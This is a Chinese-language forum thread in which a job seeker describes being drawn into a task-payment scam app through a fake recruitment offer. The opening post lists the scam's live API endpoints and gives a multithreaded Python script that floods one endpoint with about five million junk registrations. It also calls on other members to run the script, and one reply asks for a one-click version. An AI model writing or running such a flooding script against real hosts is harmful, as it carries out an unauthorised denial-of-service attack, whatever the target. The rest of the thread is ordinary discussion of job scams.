全球主机交流论坛备用站

 找回密码
 立即注册

QQ登录

只需一步,快速开始

全球云38元起免备案V2EX搬瓦工VPS
SEO查询超级PING网站测速
Virmach特价鸡乌云漏洞吾爱破解
查看: 125|回复: 5

找工作被诈骗了,怎么办 mjj 这年头工作也找不到了阿

[复制链接]

53

主题

852

回帖

2703

积分

金牌会员

Rank: 6Rank: 6

积分
2703
发表于 2024-10-22 12:23:45 | 显示全部楼层 |阅读模式
20230417
本帖最后由 XSProMax 于 2024-10-22 12:26 编辑

大概就是  很久之前投的简历

20241021使用165XXXXXXXX发送短信确认我的邮箱   回复了之后就是邮件沟通  对方是 163  我是139  然后 发了公司的简介 和子公司就是我投递简历的公司  然后看了待遇还可以  就一直邮件沟通  最后说让我下载一个挂着企业微信的图标 叫企业办公助手 的APP  ios没有商家 授权是一个山东的企业  User-Agent: qi ye ban gong zhu shou/1.2.4 (iPhone; iOS 15.7.6; Scale/3.00)

然后就在这上面每隔10分钟做一下任务  然后 结账  152元


20241022 早上9点开始 做了30分钟的任务开始让交钱做其他的任务   我表示没钱 说我30多岁的人 几百块也没有  然后就把我t了   哭哭惹

抓包看了一下 应该是网易的 一个开源软件有这个网址的流量 lbs.netease.im  

http://85371.yyddh002.xyz:30432/api
http://2o74hr793yjpg.10-21.ccict3.bond:30432/api
http://m28ndomz15x1vgc.yyddh005.xyz:30432/api
http://s9jlymea1.10-21.ccict3.shop:30432/api
http://jy3m5.yyddh005.cc:30432/api


这个就是注册账户的一些请求 写了个脚本放在 marscode里面跑  

  1. import requests
  2. import threading
  3. import random
  4. import time

  5. # 定义请求头
  6. headers = {
  7.     'Accept': '/',
  8.     'Accept-Encoding': 'gzip, deflate',
  9.     'Accept-Language': 'zh-Hans-US;q=1, en-US;q=0.9',
  10.     'Connection': 'keep-alive',
  11.     'Content-Type': 'application/x-www-form-urlencoded',
  12.     'Proxy-Connection': 'Keep-Alive',
  13.     'User-Agent': 'qi ye ban gong zhu shou/1.2.4 (iPhone; iOS 15.7.6; Scale/3.00)'
  14. }

  15. # 定义请求URL
  16. url = 'http://s9jlymea1.10-21.ccict3.shop:30432/api/user/register'

  17. def generate_account_and_password():
  18.     account = 'cnm' + str(random.randint(0, 9999999)).zfill(7)
  19.     password = 'cnm' + str(random.randint(0, 9999999)).zfill(7)
  20.     while password == account:
  21.         password = 'cnm' + str(random.randint(0, 9999999)).zfill(10)
  22.     return account, password

  23. def register_user(account_password_pairs, file):
  24.     for account, password in account_password_pairs:
  25.         current_timestamp = int(time.time())  # 获取当前时间的时间戳
  26.         data = {
  27.             'account': account,
  28.             'deviceNo': 'BAGAYALUCAONIMACHOUPIANZI',
  29.             'ip': '127.0.0.1',
  30.             'nickname': '操NI妈',
  31.             'os': 'iOS',
  32.             'password': password,
  33.             'repassword': password,
  34.             'timestamp': current_timestamp,
  35.             'token': 'caonima-caonima-caonima-caonima'
  36.         }

  37.         response = requests.post(url, headers=headers, data=data)
  38.         result = f'Account: {account}, Password: {password}, Response: {response.text}'
  39.         file.write(result)

  40. # 创建并启动80个线程
  41. num_threads = 80
  42. threads = []
  43. accounts_per_thread = 5000000 // num_threads

  44. with open('registration_results.txt', 'a+') as file:
  45.     for _ in range(num_threads):
  46.         account_password_pairs = []
  47.         for _ in range(accounts_per_thread):
  48.             account, password = generate_account_and_password()
  49.             account_password_pairs.append((account, password))
  50.         thread = threading.Thread(target=register_user, args=(account_password_pairs, file))
  51.         threads.append(thread)
  52.         thread.start()

  53.     # 等待所有线程完成
  54.     for thread in threads:
  55.         thread.join()
复制代码



麻烦各位的机器开始跑起来!!!!!
MJJ,你的签名掉了~~~
回复

使用道具 举报

2

主题

272

回帖

672

积分

高级会员

Rank: 4

积分
672
发表于 2024-10-22 12:26:47 | 显示全部楼层
能不能一键脚本。这个太复杂了。不会
MJJ,你的签名掉了~~~
回复 支持 反对

使用道具 举报

53

主题

852

回帖

2703

积分

金牌会员

Rank: 6Rank: 6

积分
2703
 楼主| 发表于 2024-10-22 12:30:39 | 显示全部楼层
=== 发表于 2024-10-22 12:26
能不能一键脚本。这个太复杂了。不会

好吧 下次我注意 这次我自己跑吧 !
MJJ,你的签名掉了~~~
回复 支持 反对

使用道具 举报

53

主题

852

回帖

2703

积分

金牌会员

Rank: 6Rank: 6

积分
2703
 楼主| 发表于 2024-10-22 12:26:00 | 显示全部楼层
我还期待着 告诉我 可以去上班了呢!!!
MJJ,你的签名掉了~~~
回复 支持 反对

使用道具 举报

6

主题

52

回帖

158

积分

注册会员

Rank: 2

积分
158
发表于 2024-10-22 12:34:02 | 显示全部楼层
我也遇到过。。。问题是我投的网络安全岗位啊。。不是找D么。。
MJJ,你的签名掉了~~~
回复 支持 反对

使用道具 举报

53

主题

852

回帖

2703

积分

金牌会员

Rank: 6Rank: 6

积分
2703
 楼主| 发表于 2024-10-22 13:29:19 | 显示全部楼层
nickyeh 发表于 2024-10-22 13:29
我也遇到过。。。问题是我投的网络安全岗位啊。。不是找D么。。

我是运维工程师的岗位- - 唉
MJJ,你的签名掉了~~~
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

展开

QQ|Archiver|手机版|小黑屋|全球主机交流论坛备用站

GMT+8, 2025-1-21 20:23 , Processed in 0.058682 second(s), 27 queries , Gzip On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表